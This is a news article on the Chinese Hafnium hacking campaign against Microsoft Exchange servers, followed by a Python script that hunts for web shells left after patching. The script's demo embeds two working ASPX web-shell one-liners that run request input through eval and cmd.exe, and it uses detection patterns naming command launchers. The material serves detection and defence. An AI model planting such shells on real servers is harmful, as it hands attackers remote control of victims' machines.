Microsoft Hack: Chinese espionage targeting email servers spooks White House
What's the story
A state-sponsored Chinese hacking group, which Microsoft has dubbed Hafnium, has been breaking into organizations that run Microsoft's business email software, Exchange Server.
Estimates put the number of known victims worldwide at 60,000 or more. The attackers exploited a chain of critical vulnerabilities in Microsoft Exchange Server to siphon off mailboxes and, in many cases, to gain remote control over the compromised servers.
Thus far, known victims of the cyber-espionage campaign range from government agencies to small and medium-sized businesses.
Automated attacks
Chinese hackers ramped up attacks after Microsoft issued patches
The attack came to light on March 2, when Microsoft released emergency security updates to close the holes in on-premises Exchange Server 2013, 2016 and 2019 (Exchange Online, the hosted service, was not affected).
However, the attackers ramped up exploitation far faster than businesses and government agencies could install the patches.
This rapid escalation drew the concern of US national security officials and the White House itself.
Puppet masters
Hackers inject compromised systems with 'web shell' providing easy backdoor
The attacks have left hundreds of thousands of Microsoft Exchange servers with a "web shell": a small, password-protected script planted among the server's web pages that lets the attackers run commands on the machine over ordinary HTTP requests from anywhere in the world.
After Microsoft's announcement last Tuesday, the attackers automated the search for unpatched servers and the installation of shells on them, casting their net far wider. This has allowed them to stay a step ahead of defenders racing to patch.
Casting a wide net
Cyberattacks were indiscriminate initially, but began targeting valuable assets later
Prima facie, the indiscriminate targeting of businesses might look random. It is, however, a deliberate strategy: compromise as many systems as possible while the vulnerabilities are still unpatched, and only later sift through the haul for valuable intelligence.
This allows the attackers to single out high-value victims such as defense contractors, infectious disease researchers, government agencies, and other organizations holding scientific, industrial, or business intelligence, long after the initial break-in.
Justifiably spooked
White House emphasizes the far-reaching impact of the cyberattacks
White House press secretary Jen Psaki emphasized that the vulnerabilities discovered thus far were "significant" and "could have far-reaching impacts". Microsoft's email software is widely used by Western government agencies and businesses alike.
KrebsOnSecurity reported finding backdoors on critical US organizations spanning banks, credit unions, telecom providers, public utilities, police departments, and fire rescue units.
Details
Installing the patches does not eject hackers from infected networks
To make matters worse, businesses cannot eject the intruders simply by patching their Microsoft Exchange Server. The patch closes the entry point, but any web shell already planted keeps working, and whatever the attackers did with it (stolen credentials, added accounts, footholds on other machines) stays in place. Once a server has been infected, every machine the attackers could have reached from it requires exhaustive diagnosis and cleanup, a process that can take months for most organizations. Microsoft published indicators of compromise in the days after the patches so that administrators could hunt for shells and not just patch.
The Chinese hackers are quite likely siphoning off emails indiscriminately, so that they can mine the data for valuable information at a later date.
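The kind of check described above, hunting for web shells left behind after patching (and illustrating what a dropped shell looks like, as in the "Puppet masters" section), as an added example that is not code from the article or from Microsoft. It compares the server-side script files under an Exchange web root against a known-good manifest of file hashes and flags scripts whose content reads request input and feeds it to an evaluator or command launcher. The directory layout, the manifest, the indicator patterns and the sample pages are all constructed for the demo; a real hunt would run against the actual web root with a manifest taken from a clean install.

```python
"""Web-shell hunt over an Exchange/IIS web root (added example, not from the article).

Patching closes the entry point but leaves any web shell that was already
dropped. This script compares server-side script files under the web root
against a known-good manifest and looks for content typical of a web shell.
The paths, manifest and sample pages below are constructed for the demo.
"""
import hashlib
import re
import tempfile
from pathlib import Path

# File types IIS executes server-side; anything else (images, css) is judged
# only by the baseline comparison.
SCRIPT_EXTENSIONS = {".aspx", ".ashx", ".asmx", ".asax"}

# Content indicators: a shell takes attacker input from the request and hands
# it to an evaluator or a process launcher. A single hit is common in
# legitimate pages (every logon form reads the request), so a file is flagged
# on two or more.
INDICATORS = [
    ("reads request input", re.compile(r"\bRequest\s*[\[.(]")),
    ("dynamic eval", re.compile(r"\beval\s*\(", re.IGNORECASE)),
    ("process launch", re.compile(r"Process\.Start|cmd\.exe|powershell", re.IGNORECASE)),
]


def sha256_of(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def content_indicators(text: str) -> list[str]:
    """Names of the indicators present in a page's source."""
    return [name for name, rx in INDICATORS if rx.search(text)]


def scan_webroot(root: Path, baseline: dict[str, str]) -> list[tuple[str, list[str]]]:
    """Return (relative path, reasons) for every file that needs triage."""
    findings = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        is_script = path.suffix.lower() in SCRIPT_EXTENSIONS
        reasons = []
        expected = baseline.get(rel)
        if expected is None:
            if is_script:
                reasons.append("server-side script not in baseline")  # dropped file
        elif expected != sha256_of(path):
            reasons.append("content differs from baseline")  # shipped file tampered with
        if is_script:
            hits = content_indicators(path.read_text(errors="replace"))
            if len(hits) >= 2:
                reasons.append("web-shell indicators: " + ", ".join(hits))
        if reasons:
            findings.append((rel, reasons))
    return findings


# Constructed sample pages. LEGIT_* stand in for files shipped with the product;
# the two shells mirror the one-line eval / command-launch style of ASPX shells.
LEGIT_LOGON = ('<%@ Page Language="C#" %>\n<html><body><form method="post">'
               'Outlook logon: <%= Request.Form["username"] %></form></body></html>\n')
LEGIT_SIGNOUT = '<%@ Page Language="C#" %>\n<html><body>Signed out.</body></html>\n'
EVAL_SHELL = ('<script runat="server" language="JScript">'
              'function Page_Load(){ eval(Request["cmd"], "unsafe"); }</script>\n')
CMD_SHELL = ('<script runat="server" language="C#">void Page_Load(){ '
             'System.Diagnostics.Process.Start("cmd.exe", "/c " + Request["c"]); }</script>\n')


def build_demo_tree() -> tuple[Path, dict[str, str]]:
    """Throwaway web root: two shipped pages and a logo, then two planted shells."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    shipped = {"owa/auth/logon.aspx": LEGIT_LOGON, "owa/auth/signout.aspx": LEGIT_SIGNOUT}
    for rel, body in shipped.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_text(body)
    baseline = {rel: sha256_of(root / rel) for rel in shipped}  # taken before compromise
    (root / "owa/auth/logo.png").write_bytes(b"\x89PNG\r\n\x1a\n")  # unknown but inert
    (root / "aspnet_client/system_web").mkdir(parents=True)
    (root / "aspnet_client/system_web/help.aspx").write_text(EVAL_SHELL)  # dropped shell
    (root / "owa/auth/signout.aspx").write_text(LEGIT_SIGNOUT + CMD_SHELL)  # backdoored page
    return root, baseline


def run_demo() -> list[tuple[str, list[str]]]:
    root, baseline = build_demo_tree()
    return scan_webroot(root, baseline)


if __name__ == "__main__":
    for rel, reasons in run_demo():
        print(f"{rel}: {'; '.join(reasons)}")
```

Two design points matter in practice. The baseline comparison catches a shell appended to a legitimate page, which content matching alone would still catch here but which a filename-only review would miss; and the two-indicator threshold keeps the genuine logon form, which also reads the request, out of the findings. Flagged files are a triage list, not a verdict: a shell is evidence that the server was used, so the cleanup the article describes has to follow the intruder's activity outward from it.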